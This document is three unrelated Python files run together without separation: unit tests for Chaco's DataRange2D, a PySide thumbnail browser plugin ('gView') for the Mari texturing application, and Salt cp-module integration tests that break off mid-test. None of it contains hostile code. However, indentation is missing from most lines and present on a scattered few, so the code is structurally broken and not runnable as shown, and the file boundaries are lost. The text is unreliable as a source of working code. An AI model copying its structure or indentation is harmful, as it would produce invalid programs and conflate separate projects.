import unittest
from numpy import alltrue, arange, array, ravel, transpose, zeros, inf, isinf
from numpy.testing import assert_equal, assert_
from chaco.api import DataRange2D, GridDataSource, PointDataSource
class DataRange2DTestCase(unittest.TestCase):
def test_empty_range(self):
r = DataRange2D()
assert_ary_(r.low,array([-inf,-inf]))
assert_ary_(r.high,array([inf,inf]))
self.assert_(r.low_setting == ('auto','auto'))
self.assert_(r.high_setting == ('auto', 'auto'))
r.low = array([5.0,5.0])
r.high = array([10.0,10.0])
assert_ary_(r.low_setting, array([5.0,5.0]))
assert_ary_(r.high_setting, array([10.0,10.0]))
assert_ary_(r.low,array([5.0,5.0]))
assert_ary_(r.high, array([10.0,10.0]))
return
def test_single_source(self):
r = DataRange2D()
x = arange(10.)
y = arange(0.,100.,10.)
ds = PointDataSource(transpose(array([x,y])), sort_order="none")
r.add(ds)
assert_ary_(r.low, array([0.,0.]))
assert_ary_(r.high, array([9.0,90.0]))
r.low = [3.0,30.0]
r.high = [6.0,60.0]
assert_ary_(r.low_setting, array([3.0,30.0]))
assert_ary_(r.high_setting, array([6.0,60.0]))
assert_ary_(r.low, array([3.0,30.0]))
assert_ary_(r.high, array([6.0,60.0]))
r.refresh()
assert_ary_(r.low_setting, array([3.0,30.0]))
assert_ary_(r.high_setting, array([6.0,60.0]))
assert_ary_(r.low, array([3.0,30.0]))
assert_ary_(r.high, array([6.0,60.0]))
r.low = ('auto', 'auto')
self.assert_(r.low_setting == ('auto', 'auto'))
assert_ary_(r.low, array([0.0,0.0]))
return
def test_constant_values(self):
r = DataRange2D()
ds = PointDataSource(array([[5.0,5.0]]), sort_order="none")
r.add(ds)
# A constant value > 1.0, by default, gets a range that brackets
# it to the nearest power of ten above and below
assert_ary_(r.low, array([1.0,1.0]))
assert_ary_(r.high, array([10.0,10.0]))
r.remove(ds)
ds = PointDataSource(array([[31.4,9.7]]))
r.add(ds)
assert_ary_(r.low, array([10.0,1.0]))
assert_ary_(r.high, array([100.0,10.0]))
r.remove(ds)
ds = PointDataSource(array([[0.125,0.125]]))
r.add(ds)
assert_ary_(r.low, array([0.0, 0.0]))
assert_ary_(r.high, array([0.25, 0.25]))
r.remove(ds)
ds = PointDataSource(array([[-0.125, -0.125]]))
r.add(ds)
assert_ary_(r.low, array([-0.25, -0.25]))
assert_ary_(r.high, array([0.0, 0.0]))
return
def test_multi_source(self):
x = arange(10.)
y = arange(0.,100.,10.)
foo = transpose(array([x,y]))
bar = transpose(array([y,x]))
ds1 = PointDataSource(foo)
ds2 = PointDataSource(bar)
r = DataRange2D(ds1, ds2)
assert_ary_(r.low, [0.0,0.0])
assert_ary_(r.high, [90.,90.])
return
def test_grid_source(self):
test_xd1 = array([1,2,3])
test_yd1 = array([1.5, 0.5, -0.5, -1.5])
test_sort_order1 = ('ascending', 'descending')
test_xd2 = array([0,50,100])
test_yd2 = array([0.5, 0.75, 1])
ds1 = GridDataSource(xdata=test_xd1, ydata=test_yd1,
sort_order=test_sort_order1)
ds2 = GridDataSource(xdata=test_xd2, ydata=test_yd2)
r = DataRange2D()
r.add(ds1)
assert_ary_(r.low, array([1,-1.5]))
assert_ary_(r.high, array([3,1.5]))
r.add(ds2)
assert_ary_(r.low, array([0.0,-1.5]))
assert_ary_(r.high, array([100,1.5]))
r.remove(ds1)
assert_ary_(r.low, array([0,0.5]))
assert_ary_(r.high, array([100,1]))
r.remove(ds2)
assert_ary_(r.low, array([-inf,-inf]))
assert_ary_(r.high, array([inf,inf]))
def test_set_bounds(self):
test_xd = array([-10,10])
test_yd = array([-10,10])
ds = GridDataSource(xdata=test_xd, ydata=test_yd)
r = DataRange2D()
r.set_bounds((-1,-2), (3,4))
assert_ary_(r.low, array([-1,-2]))
assert_ary_(r.high, array([3,4]))
r.add(ds)
assert_ary_(r.low, array([-1,-2]))
r.low_setting = ('auto','auto')
assert_ary_(r.low, array([-10,-10]))
assert_ary_(r.high, array([3,4]))
r.high_setting = ('auto','auto')
assert_ary_(r.low, array([-10,-10]))
assert_ary_(r.high, array([10,10]))
r.set_bounds((-100,-100), (100,100))
assert_ary_(r.low, array([-100,-100]))
assert_ary_(r.high, array([100,100]))
def test_reset_bounds(self):
r = DataRange2D()
low = (13, 42)
high = (1337, 9001)
r.set_bounds(low, high)
self.assertEqual(r.low_setting, low)
self.assertEqual(r.high_setting, high)
r.reset()
self.assertEqual(r.low_setting, ('auto', 'auto'))
self.assertEqual(r.high_setting, ('auto', 'auto'))
self.assertEqual(r.x_range.low_setting, 'auto')
self.assertEqual(r.y_range.low_setting, 'auto')
self.assertEqual(r.x_range.high_setting, 'auto')
self.assertEqual(r.y_range.high_setting, 'auto')
def test_clip_data(self):
r = DataRange2D(low=[2.0,5.0], high=[10.0,8.0])
        x = arange(10.0)
        y = arange(0.,20.,2.)
        ary = transpose(array([x,y]))
        assert_equal(r.clip_data(ary), array([[3.,6.],[4.,8.]]))
r = DataRange2D(low=[10.,10.], high=[20.,20.])
        x = arange(10.0,30.,2.)
        y = arange(0.,40.,4.)
        ary = transpose(array([x,y]))
        assert_equal(r.clip_data(ary), array([[16.,12.],[18.,16.],[20.,20.]]))
        assert_equal(r.clip_data(ary[::-1]), array([[20,20], [18,16], [16,12]]))
return
def test_mask_data(self):
r = DataRange2D(low=[2.0,5.0], high=[10.0,18.0])
x = array([1, 3, 4, 9.8, 10.2, 12])
y = array([5, 3, 7, 12, 18, 6])
ary = transpose(array([x,y]))
        assert_equal(r.mask_data(ary), array([0,0,1,1,0,0], 'b'))
r = DataRange2D(low=[10.,15.], high=[20.,25.])
x = array([5, 10, 15, 20, 25, 30])
y = array([5, 10, 15, 20, 25, 30])
ary = transpose(array([x,y]))
target_mask = array([0,0,1,1,0,0], 'b')
        assert_equal(r.mask_data(ary), target_mask)
        assert_equal(r.mask_data(ary[::-1]), target_mask[::-1])
r = DataRange2D(low=[2.0,5.0], high=[2.5,9.0])
        assert_equal(r.mask_data(ary), zeros(len(ary)))
return
def assert_close_(desired, actual):
diff_allowed = 1e-5
diff = abs(ravel(actual) - ravel(desired))
for d in diff:
if not isinf(d):
assert_(alltrue(d <= diff_allowed))
return
def assert_ary_(desired, actual):
    if desired == 'auto':
        assert_equal(actual, 'auto')
        # return early so the element loop below is not run on the string
        return
    for d in range(len(desired)):
        assert_equal(desired[d], actual[d])
    return
if __name__ == '__main__':
import nose
nose.run()
#gView 0.5.5
#View Module - gViewer.py
#---------------------------------------------------
#Description: Texture thumbnail browser for Mari
#Supported Versions: 2.6.x
#Author: Ben Neall, Contact: bneall@gmail.com
#copyright Ben Neall 2014
import PySide.QtGui as QtGui
import PySide.QtCore as QtCore
import threading
import json
import os
import uuid
import glob
import mari
###--------------------------------------------------------------------------###
### COMMON
###--------------------------------------------------------------------------###
mari_icon_path = mari.resources.path(mari.resources.ICONS)
mari_user_path = mari.resources.path(mari.resources.USER)
mari_script_path = mari.resources.path(mari.resources.USER_SCRIPTS)
###--------------------------------------------------------------------------###
### gView COMMON
###--------------------------------------------------------------------------###
gViewTempDir = '/usr/tmp'
if mari.app.version().isWindows():
gViewTempDir = 'C:\\temp'
if mari.app.version().isMac():
gViewTempDir = '/tmp'
gViewIconDir = os.path.join(mari_script_path, 'gView', 'Icons')
gViewThumbDir = 'gViewThumbs'
gViewBmarkFile = os.path.join(mari_user_path, 'gViewBookmark.prefs')
gViewConfigFile = os.path.join(mari_user_path, 'gViewConfig.prefs')
gViewItemHPad = 20
gViewItemVPad = 10
gViewItemSize = 210
gViewSizes = [200, 800]
QtGui.QPixmapCache.setCacheLimit(51200)
###--------------------------------------------------------------------------###
### LOAD CONFIG
###--------------------------------------------------------------------------###
try:
configFile = open(gViewConfigFile)
config = json.load(configFile)
gViewTempDir = config['gViewTempDir']
gViewSizes = config['gViewSizes']
except (IOError, ValueError, KeyError):
    # fall back to the defaults above if the config file is missing or malformed
    pass
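# The config file is plain JSON written by GView.writePrefs() on exit, e.g.:
#   {"gViewTempDir": "/usr/tmp", "gViewSizes": [200, 800]}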
###--------------------------------------------------------------------------###
### BOOKMARK SYSTEM
###--------------------------------------------------------------------------###
class GBookmarkItem(QtGui.QTreeWidgetItem):
def __init__(self, name):
super(GBookmarkItem, self).__init__()
self.setText(0, name)
self.setFlags(
QtCore.Qt.ItemIsEditable
| QtCore.Qt.ItemIsEnabled
| QtCore.Qt.ItemIsSelectable
| QtCore.Qt.ItemIsDropEnabled
| QtCore.Qt.ItemIsDragEnabled
)
self.setIcon(0, QtGui.QIcon('%s/Folder32x32.png' % gViewIconDir))
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.RightButton:
pass
class GBookmark(QtGui.QTreeWidget):
pathAdded = QtCore.Signal(str)
itemMoved = QtCore.Signal()
currentItems = []
pathList = []
def __init__(self):
super(GBookmark, self).__init__()
self.setMinimumWidth(100)
self.setDragDropMode(self.InternalMove)
self.installEventFilter(self)
self.setColumnCount(1)
self.setAlternatingRowColors(True)
self.setIndentation(10)
self.setHeaderHidden(True)
self.setEditTriggers(QtGui.QAbstractItemView.SelectedClicked)
self.setDragEnabled(True)
self.setSelectionMode(self.ExtendedSelection)
self.itemChanged.connect(self.sortAllItems)
self.itemMoved.connect(self.restoreExpandedState)
#Style
self.setStyleSheet("\
QTreeWidget { alternate-background-color: rgb(105, 105, 105); } \
")
#Context Menu
self.menu = QtGui.QMenu()
self.importAction = self.menu.addAction(QtGui.QIcon('%s/Palette.16x16.png' % mari_icon_path), 'New Group')
#Connections
self.importAction.triggered.connect(self.makeBlankItem)
def eventFilter(self, sender, event):
'''Detects when an item moves'''
if (event.type() == QtCore.QEvent.ChildRemoved):
self.itemMoved.emit()
if (event.type() == QtCore.QEvent.ChildAdded):
self.itemMoved.emit()
return False # don't actually interrupt anything
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Delete:
self.removeBookmark()
def contextMenuEvent(self, event):
self.menu.exec_(event.globalPos())
def removeBookmark(self):
for item in self.selectedItems():
if not item.parent():
index = self.indexOfTopLevelItem(item)
self.takeTopLevelItem(index)
else:
index = item.parent().indexOfChild(item)
item.parent().takeChild(index)
def sortAllItems(self):
self.sortItems(0, QtCore.Qt.AscendingOrder)
def buildFromPath(self, path=None, mode='multi'):
pathList = []
itemList = []
#Top Directory
rootName = os.path.basename(path)
rootPath = path
rootItem = GBookmarkItem(rootName)
rootItem.setData(0, 32, [None, rootName, rootPath])
itemList.append(rootItem)
self.addTopLevelItem(rootItem)
        if mode == 'multi':
self.pathAdded.emit(rootPath)
#Sub Directories
for root, dirs, files in os.walk(path):
for name in dirs:
if not name.startswith('.'):
parent = root
fullpath = os.path.join(root, name)
bookmarkData = [parent, name, fullpath]
parentItem = self.findParentItem(parent)
if parentItem:
newItem = GBookmarkItem(name)
newItem.setData(0, 32, bookmarkData)
parentItem.insertChild(0, newItem)
itemList.append(newItem)
self.pathAdded.emit(fullpath)
#Build IDs
self.setItemUUID(itemList)
self.setParentUUID()
#Sort and Expand
self.sortAllItems()
def makeBlankItem(self):
inputText, ok = QtGui.QInputDialog.getText(self, 'Create New Group', 'Enter name:')
if ok:
#Keep Hierarchy
for item in self.selectedItems():
if item.childCount() >= 1:
for index in range(item.childCount()):
childItem = item.child(index)
childItem.setSelected(False)
#"Blank" Item
name = str(inputText)
UUID = uuid.uuid4().hex
bookmarkData = [None, name, UUID, None, True]
blankItem = GBookmarkItem(name)
blankItem.setData(0, 32, bookmarkData)
blankItem.setIcon(0, QtGui.QIcon('%s/Folder32x32.png' % gViewIconDir))
self.addTopLevelItem(blankItem)
#Group Items
for item in self.selectedItems():
if item.parent():
item.parent().removeChild(item)
else:
self.invisibleRootItem().removeChild(item)
blankItem.insertChild(0, item)
def findParentItem(self, itemParent):
it = QtGui.QTreeWidgetItemIterator(self)
while it.value():
item = it.value()
itemData = item.data(0, 32)
if itemData[2] == itemParent:
return item
it += 1
def setItemUUID(self, itemList):
for item in itemList:
name = item.text(0)
parentUUID = None
UUID = uuid.uuid4().hex
fullPath = item.data(0, 32)[2]
item.setData(0, 32, [parentUUID, name, UUID, fullPath, None])
item.setExpanded(True)
def setParentUUID(self):
it = QtGui.QTreeWidgetItemIterator(self)
while it.value():
item = it.value()
name = item.text(0)
UUID = item.data(0, 32)[2]
fullPath = item.data(0, 32)[3]
expandState = item.isExpanded()
            try:
                parentItem = item.parent()
                parentUUID = parentItem.data(0, 32)[2]
            except AttributeError:
                # top-level items have no parent (item.parent() is None)
                parentUUID = None
item.setData(0, 32, [parentUUID, name, UUID, fullPath, expandState])
it += 1
def restoreExpandedState(self):
it = QtGui.QTreeWidgetItemIterator(self)
while it.value():
item = it.value()
expandState = item.data(0, 32)[4]
item.setExpanded(expandState)
it += 1
def buildTreeItems(self):
json_data = open(gViewBmarkFile)
data = json.load(json_data)
for item in data:
parentUUID = item[0]
name = item[1]
UUID = item[2]
fullPath = item[3]
expandState = item[4]
bookmarkData = [parentUUID, name, UUID, fullPath, expandState]
parentItem = self.findParentItem(parentUUID)
if parentItem:
newItem = GBookmarkItem(name)
newItem.setData(0, 32, bookmarkData)
parentItem.insertChild(0, newItem)
newItem.setExpanded(expandState)
else:
rootItem = GBookmarkItem(name)
rootItem.setData(0, 32, bookmarkData)
self.addTopLevelItem(rootItem)
rootItem.setExpanded(expandState)
if fullPath:
self.pathAdded.emit(fullPath)
#Sort
self.sortAllItems()
def saveBookmarkFile(self):
self.setParentUUID()
dataList = []
it = QtGui.QTreeWidgetItemIterator(self)
while it.value():
item = it.value()
itemData = item.data(0, 32)
dataList.append(itemData)
it += 1
with open(gViewBmarkFile, 'w') as outfile:
json.dump(dataList, outfile)
###--------------------------------------------------------------------------###
### GVIEW
###--------------------------------------------------------------------------###
class GThumbGen(QtCore.QThread):
'''This class generates thumbnails to disc'''
thumbGen = QtCore.Signal()
finishGen = QtCore.Signal()
def __init__(self, files=None):
super(GThumbGen, self).__init__()
self.files = files
def generateThumb(self, source, thumb):
sourceImage = QtGui.QImage(source)
thumbImage = sourceImage.scaled(200,200, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation)
thumbImage.save(thumb, 'png', 75)
self.thumbGen.emit()
def run(self):
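        # Regenerate a thumbnail only when the source image is newer than its
        # cached thumbnail; otherwise just report progress for the existing one.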
for thumb, source in self.files.items():
sourceDate = os.path.getmtime(source)
if os.path.isfile(thumb):
thumbDate = os.path.getmtime(thumb)
if sourceDate > thumbDate:
self.generateThumb(source, thumb)
else:
self.thumbGen.emit()
else:
self.generateThumb(source, thumb)
self.finishGen.emit()
class GScene(QtGui.QGraphicsScene):
def __init__(self):
super(GScene, self).__init__()
#Background Color
self.setBackgroundBrush(QtGui.QBrush(QtGui.QColor(95, 95, 95)))
#Context Menu
self.menu = QtGui.QMenu()
self.importAction = self.menu.addAction(QtGui.QIcon('%s/ImportFile.png' % mari_icon_path), 'Import Selected')
self.copyAction = self.menu.addAction(QtGui.QIcon('%s/Copy.16x16.png' % mari_icon_path), 'Copy to Clipboard')
def contextMenuEvent(self, event):
self.menu.exec_(event.screenPos())
class GRectItem(QtGui.QGraphicsRectItem):
def __init__(self, image_path, source):
super(GRectItem, self).__init__()
#Attributes
self.setFlags(self.flags() | QtGui.QGraphicsItem.ItemIsSelectable)
#Rect Settings
self.setRect(0, 0, gViewItemSize, gViewItemSize)
self.rectBrush = QtGui.QBrush(QtGui.QColor(100, 100, 100))
self.rectPenBrush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
self.rectPen = QtGui.QPen(self.rectPenBrush, 1)
self.setBrush(self.rectBrush)
self.setPen(self.rectPen)
        #Pad Rect Settings
padRect = QtGui.QGraphicsRectItem()
padRect.setPen(QtGui.QPen(self.rectPenBrush, 20))
padRect.setParentItem(self)
#Thumb Title Item
thumbTitle = os.path.basename(source)
if len(thumbTitle) >= 36:
thumbTitle = thumbTitle[:34]+'...'
self.setData(32, source)
#Title Size Check
self.thumbTitleItem = QtGui.QGraphicsSimpleTextItem(thumbTitle)
self.thumbTitleItem.setBrush(QtGui.QBrush(QtGui.QColor(200, 200, 200)))
self.thumbTitleItem.setPos(0, gViewItemSize)
self.thumbTitleItem.setParentItem(self)
#Thumb Image Item
thumbImage = QtGui.QPixmap()
        #Cache thumbnail (find() fills thumbImage on a cache hit)
        if not QtGui.QPixmapCache.find(image_path, thumbImage):
            thumbImage.load(image_path)
            QtGui.QPixmapCache.insert(image_path, thumbImage)
#Configure items with alphas
if thumbImage.hasAlpha():
backgroundImage = QtGui.QImage('%s/GrayChecker.png' % gViewIconDir)
bgBrush = QtGui.QBrush(backgroundImage)
self.setBrush(bgBrush)
thumbImgItem = QtGui.QGraphicsPixmapItem(thumbImage)
thumbWidth = thumbImgItem.pixmap().width()
thumbHeight = thumbImgItem.pixmap().height()
thumbHOffset = (gViewItemSize-thumbWidth)/2
thumbVOffset = (gViewItemSize-thumbHeight)/2
thumbImgItem.setPos(thumbHOffset, thumbVOffset)
thumbImgItem.setParentItem(self)
    def itemChange(self, change, value):
        if change == QtGui.QGraphicsItem.ItemSelectedChange:
            if value:
                self.setHighlite()
            else:
                self.removeHighlite()
        return QtGui.QGraphicsItem.itemChange(self, change, value)
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.RightButton:
pass
def setHighlite(self):
highlitePenBrush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
highlitePen = QtGui.QPen(highlitePenBrush, 3)
self.setPen(highlitePen)
def removeHighlite(self):
self.setPen(self.rectPen)
class GView(QtGui.QWidget):
path = None
maxColumns = 6
vSceneSize = 0
hSceneSize = 0
items = 0
def __init__(self):
super(GView, self).__init__()
mainLayout = QtGui.QVBoxLayout()
self.viewSplitter = QtGui.QSplitter()
toolLayout = QtGui.QHBoxLayout()
progLayout = QtGui.QHBoxLayout()
self.setLayout(mainLayout)
self.gbook = GBookmark()
self.gviewer = QtGui.QGraphicsView()
self.gscene = GScene()
self.gviewer.setInteractive(True)
self.gviewer.setScene(self.gscene)
self.gviewer.setAlignment( QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft )
self.gviewer.resize(mari.app.canvasWidth() * 0.8, mari.app.canvasHeight())
self.gbook.resize(mari.app.canvasWidth() * 0.2, mari.app.canvasHeight())
self.pathLine = QtGui.QLineEdit()
self.pathLabel = QtGui.QLabel('Path:')
self.searchLine = QtGui.QLineEdit()
self.searchLine.setMaximumWidth(200)
self.searchLabel = QtGui.QLabel('Filter:')
self.columnSpin = QtGui.QSpinBox()
self.progBar1 = QtGui.QProgressBar()
self.progLabel = QtGui.QLabel('Generating Thumbnails...')
self.progStatus = QtGui.QLabel()
self.progBar1.setHidden(True)
self.progLabel.setHidden(True)
self.progStatus.setHidden(True)
self.browseBtn = QtGui.QPushButton('Browse')
self.prefsBtn = QtGui.QToolButton()
self.prefsBtn.setIcon(QtGui.QIcon('%s/ToolProperties.png' % mari_icon_path))
self.prefsBtn.setToolTip('Set Thumbnail location')
self.wizardBtn = QtGui.QToolButton()
self.wizardBtn.setIcon(QtGui.QIcon('%s/MagicWand.png' % gViewIconDir))
self.wizardBtn.setToolTip('Crawl Directories')
self.addBookmarkBtn = QtGui.QToolButton()
self.addBookmarkBtn.setIcon(QtGui.QIcon('%s/Star16x16.png' % gViewIconDir))
self.addBookmarkBtn.setToolTip('Add bookmark for current path')
self.loadBtn = QtGui.QToolButton()
self.loadBtn.setIcon(QtGui.QIcon('%s/ReloadShaders.png' % mari_icon_path))
self.loadBtn.setToolTip('Load path into viewer')
self.fitBtn = QtGui.QToolButton()
self.fitBtn.setIcon(QtGui.QIcon('%s/ABSSize.png' % mari_icon_path))
self.fitBtn.setToolTip('Fit column width to view')
self.statusBarLabel = QtGui.QLabel('Resolution: Format: Size: Name: ')
self.statusBarLabel.setHidden(True)
toolLayout.addWidget(self.prefsBtn)
toolLayout.addWidget(self.wizardBtn)
toolLayout.addWidget(self.searchLabel)
toolLayout.addWidget(self.searchLine)
toolLayout.addWidget(self.pathLabel)
toolLayout.addWidget(self.pathLine)
toolLayout.addWidget(self.browseBtn)
toolLayout.addWidget(self.addBookmarkBtn)
toolLayout.addWidget(self.loadBtn)
self.viewSplitter.addWidget(self.gbook)
self.viewSplitter.addWidget(self.gviewer)
self.viewSplitter.setCollapsible(0, False)
self.viewSplitter.setCollapsible(1, False)
progLayout.addWidget(self.progLabel)
progLayout.addWidget(self.progBar1)
progLayout.addWidget(self.progStatus)
progLayout.addWidget(self.statusBarLabel)
progLayout.addStretch()
progLayout.addWidget(self.columnSpin)
progLayout.addWidget(self.fitBtn)
mainLayout.addLayout(toolLayout)
mainLayout.addWidget(self.viewSplitter)
mainLayout.addLayout(progLayout)
self.browseBtn.clicked.connect(self.browseCustomPath)
self.loadBtn.clicked.connect(self.loadFromCustomPath)
self.addBookmarkBtn.clicked.connect(self.setBookmark)
self.fitBtn.clicked.connect(self.fitColumnsToCanvas)
self.searchLine.textChanged.connect(self.sortItems)
self.columnSpin.valueChanged.connect(self.setColumns)
self.gscene.importAction.triggered.connect(self.importImages)
self.gscene.copyAction.triggered.connect(self.copyPathToClipboard)
self.gbook.itemSelectionChanged.connect(self.loadFromBookmark)
self.prefsBtn.clicked.connect(self.setTempDir)
self.wizardBtn.clicked.connect(self.setWizardBookmark)
self.gbook.pathAdded.connect(self.crawlWizard)
self.viewSplitter.splitterMoved.connect(self.fitColumnsToCanvas)
self.gscene.selectionChanged.connect(self.updateStatusLabel)
mari.utils.connect(mari.app.exiting, self.writePrefs)
#Load bookmark Preferences
        try:
            self.gbook.buildTreeItems()
        except (IOError, ValueError):
            print "gView Message: No prefs file found"
self.viewSplitter.setSizes(gViewSizes)
def updateStatusLabel(self):
selectedItem = self.gscene.selectedItems()
if selectedItem and len(selectedItem) == 1:
source = selectedItem[0].data(32)
reader = QtGui.QImageReader(source)
name = os.path.basename(source)
res = '%dx%d' % (reader.size().width(), reader.size().height())
size = QtCore.QFileInfo(source).size() / 1024
statusString = 'Name: %s Resolution: %s Size: %s KB' % (name, res, size)
self.statusBarLabel.setText(statusString)
self.statusBarLabel.setHidden(False)
else:
self.statusBarLabel.setHidden(True)
def getThumbnailPath(self, path):
self.thumbnailPath = '%s/%s%s' % (gViewTempDir, gViewThumbDir, path)
if mari.app.version().isWindows():
cleanPath = path.replace(':','')
self.thumbnailPath = os.path.join(gViewTempDir, gViewThumbDir, cleanPath)
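        # e.g. on Windows, path 'C:\\textures' yields
        # 'C:\\temp\\gViewThumbs\\C\\textures' -- the drive colon is stripped
        # so the source tree can be mirrored under the temp dir.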
def buildPathDict(self, path):
self.getThumbnailPath(path)
supportedFormats = QtGui.QImageWriter.supportedImageFormats()
self.fileDict = {}
dirList = os.listdir(path)
for file in dirList:
filePath = os.path.join(path, file)
if os.path.isfile(filePath):
#Build thumbnail directories
if not os.path.exists(self.thumbnailPath):
os.makedirs(self.thumbnailPath)
#File paths
thumbFile = '%s.%s' % (os.path.splitext(file)[0], 'png')
thumbFile = os.path.join(self.thumbnailPath, thumbFile)
#Format check:
fileExtension = file.split(".")[-1]
if fileExtension.lower() in supportedFormats:
#Build file dict
self.fileDict[thumbFile]=filePath
def setBookmark(self):
if not self.pathLine.text():
return
self.path = self.pathLine.text()
self.gbook.buildFromPath(path=self.path, mode='single')
def setWizardBookmark(self):
path = QtGui.QFileDialog.getExistingDirectory(self, caption="Choose Texture Folder", options=QtGui.QFileDialog.ShowDirsOnly)
if path:
self.gbook.buildFromPath(path, mode='multi')
def loadFromBookmark(self):
selectedItems = self.gbook.selectedItems()
if len(selectedItems) > 1 or len(selectedItems) == 0:
return
self.path = selectedItems[0].data(0, 32)[3]
self.pathLine.setText(self.path)
if self.path:
self.buildThumbnails()
def loadFromCustomPath(self):
self.path = self.pathLine.text()
self.buildThumbnails()
def buildThumbnails(self):
self.buildPathDict(self.path)
self.imageCount = len(self.fileDict)
self.initProgBar()
thumbnailThread = GThumbGen(self.fileDict)
thumbnailThread.thumbGen.connect(self.thumbGenProgress)
thumbnailThread.finishGen.connect(self.populateSceneTHREAD)
thumbnailThread.run()
def initProgBar(self):
self.progBar1.setMaximum(self.imageCount)
self.progBar1.setHidden(False)
self.progLabel.setHidden(False)
self.progStatus.setHidden(False)
    def thumbGenProgress(self):
        currentValue = self.progBar1.value() + 1
        self.progBar1.setValue(currentValue)
        self.progStatus.setText('%s: %s/%s' % (os.path.basename(self.path), currentValue, self.imageCount))
        QtCore.QCoreApplication.processEvents()
    def populateSceneTHREAD(self):
        # Pass the method itself, not its result. Note run() executes the
        # target synchronously in the calling thread, keeping GUI updates safe.
        newThread = threading.Thread(target=self.populateScene)
        newThread.run()
def populateScene(self):
self.gscene.clear()
self.setCursor(QtCore.Qt.BusyCursor)
sortedFiles = sorted(self.fileDict.iteritems())
for item in sortedFiles:
thumb = item[0]
source= item[1]
bgRectItem = GRectItem(thumb, source)
self.gscene.addItem(bgRectItem)
self.items += 1
self.setPositions(bgRectItem)
self.progBar1.setHidden(True)
self.progLabel.setHidden(True)
self.progStatus.setHidden(True)
self.unsetCursor()
self.fitColumnsToCanvas()
def setPositions(self, item):
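        # Lay items out row-major: advance along the row until maxColumns
        # items have been placed, then wrap to the start of the next row.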
item.setPos(self.hSceneSize, self.vSceneSize)
        if self.items % self.maxColumns:
            # horizontal pitch matches the column math in fitColumnsToCanvas
            self.hSceneSize += gViewItemSize+gViewItemHPad
        else:
            self.vSceneSize += gViewItemSize+gViewItemVPad
            self.hSceneSize = 0
def setColumns(self):
self.maxColumns = self.columnSpin.value()
self.sortItems()
def fitColumnsToCanvas(self):
gbook_length = self.gbook.size().width()
available_area = mari.app.canvasWidth() - gbook_length
self.maxColumns = int(round(available_area / (gViewItemSize + gViewItemHPad)))
self.columnSpin.setValue(self.maxColumns)
self.sortItems()
def sortItems(self):
#Reset
self.items = 0
self.hSceneSize = 0
self.vSceneSize = 0
#List of Parent Items
groupItems = []
for item in self.gscene.items():
if item.childItems():
groupItems.append(item)
item.setVisible(False)
item.setPos(0,0)
#Reverse Group List
groupItems = groupItems[::-1]
#Display Only Items Matching Search
for item in groupItems:
searchText = self.searchLine.text()
titleItem = item.childItems()[1]
thumbName = titleItem.text().split(".")[0]
if searchText.lower() in thumbName.lower():
item.setVisible(True)
self.items += 1
self.setPositions(item)
#Resize Scene
autoRect = self.gscene.itemsBoundingRect()
self.gscene.setSceneRect(autoRect)
##Scroll to top
self.gviewer.ensureVisible(0.0,0.0,0.0,0.0)
#Refresh UI
self.gscene.update()
QtCore.QCoreApplication.processEvents()
def setTempDir(self):
global gViewTempDir
directory = QtGui.QFileDialog.getExistingDirectory(self, caption="Choose Thumbnail Folder", dir=gViewTempDir, options=QtGui.QFileDialog.ShowDirsOnly)
if directory:
gViewTempDir = directory
def browseCustomPath(self):
directory = QtGui.QFileDialog.getExistingDirectory(self, caption="Choose Texture Folder", dir=self.path, options=QtGui.QFileDialog.ShowDirsOnly)
if directory:
self.pathLine.setText(directory)
self.path = directory
self.buildThumbnails()
def writePrefs(self):
configDict = {}
configDict['gViewTempDir'] = gViewTempDir
configDict['gViewSizes'] = self.viewSplitter.sizes()
with open(gViewConfigFile, 'w') as outfile:
json.dump(configDict, outfile)
self.gbook.saveBookmarkFile()
def importImages(self):
selectedItems = self.gscene.selectedItems()
for item in selectedItems:
imagePath = item.data(32)
print "Image Imported: ", imagePath
mari.images.load(imagePath)
def copyPathToClipboard(self):
selectedItem = self.gscene.selectedItems()[-1]
imagePath = selectedItem.data(32)
QtGui.QClipboard().setText(imagePath, QtGui.QClipboard.Clipboard)
def crawlWizard(self, path):
self.path = path
self.gbook.setDisabled(True)
self.imageCount = 0
#Find directories
for root, dirs, files in os.walk(path, topdown=True):
self.imageCount += len(files)
#Make Thumbnails:
self.buildPathDict(self.path)
self.initProgBar()
thumbnailThread = GThumbGen(self.fileDict)
thumbnailThread.thumbGen.connect(self.thumbGenProgress)
thumbnailThread.run()
self.progBar1.setHidden(True)
self.progLabel.setHidden(True)
self.progStatus.setHidden(True)
self.gbook.setDisabled(False)
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import
import os
import hashlib
import tempfile
# Import Salt Testing libs
from salttesting.helpers import ensure_in_syspath
ensure_in_syspath('../../')
# Import salt libs
import integration
import salt.utils
class CPModuleTest(integration.ModuleCase):
'''
Validate the cp module
'''
def test_get_file(self):
'''
cp.get_file
'''
tgt = os.path.join(integration.TMP, 'scene33')
self.run_function(
'cp.get_file',
[
'salt://grail/scene33',
tgt,
])
with salt.utils.fopen(tgt, 'r') as scene:
data = scene.read()
self.assertIn('KNIGHT: They\'re nervous, sire.', data)
self.assertNotIn('bacon', data)
def test_get_file_templated_paths(self):
'''
cp.get_file
'''
tgt = os.path.join(integration.TMP, 'cheese')
self.run_function(
'cp.get_file',
[
'salt://{{grains.test_grain}}',
tgt.replace('cheese', '{{grains.test_grain}}')
],
template='jinja'
)
with salt.utils.fopen(tgt, 'r') as cheese:
data = cheese.read()
self.assertIn('Gromit', data)
self.assertNotIn('bacon', data)
def test_get_file_gzipped(self):
'''
cp.get_file
'''
tgt = os.path.join(integration.TMP, 'file.big')
src = os.path.join(integration.FILES, 'file/base/file.big')
        with salt.utils.fopen(src, 'r') as fp_:
            src_md5 = hashlib.md5(fp_.read()).hexdigest()
self.run_function(
'cp.get_file',
[
'salt://file.big',
tgt,
],
gzip=5
)
with salt.utils.fopen(tgt, 'r') as scene:
data = scene.read()
self.assertIn('KNIGHT: They\'re nervous, sire.', data)
self.assertNotIn('bacon', data)
        self.assertEqual(src_md5, hashlib.md5(data).hexdigest())
def test_get_file_makedirs(self):
'''
cp.get_file
'''
tgt = os.path.join(integration.TMP, 'make/dirs/scene33')
self.run_function(
'cp.get_file',
[
'salt://grail/scene33',
tgt,
],
makedirs=True
)
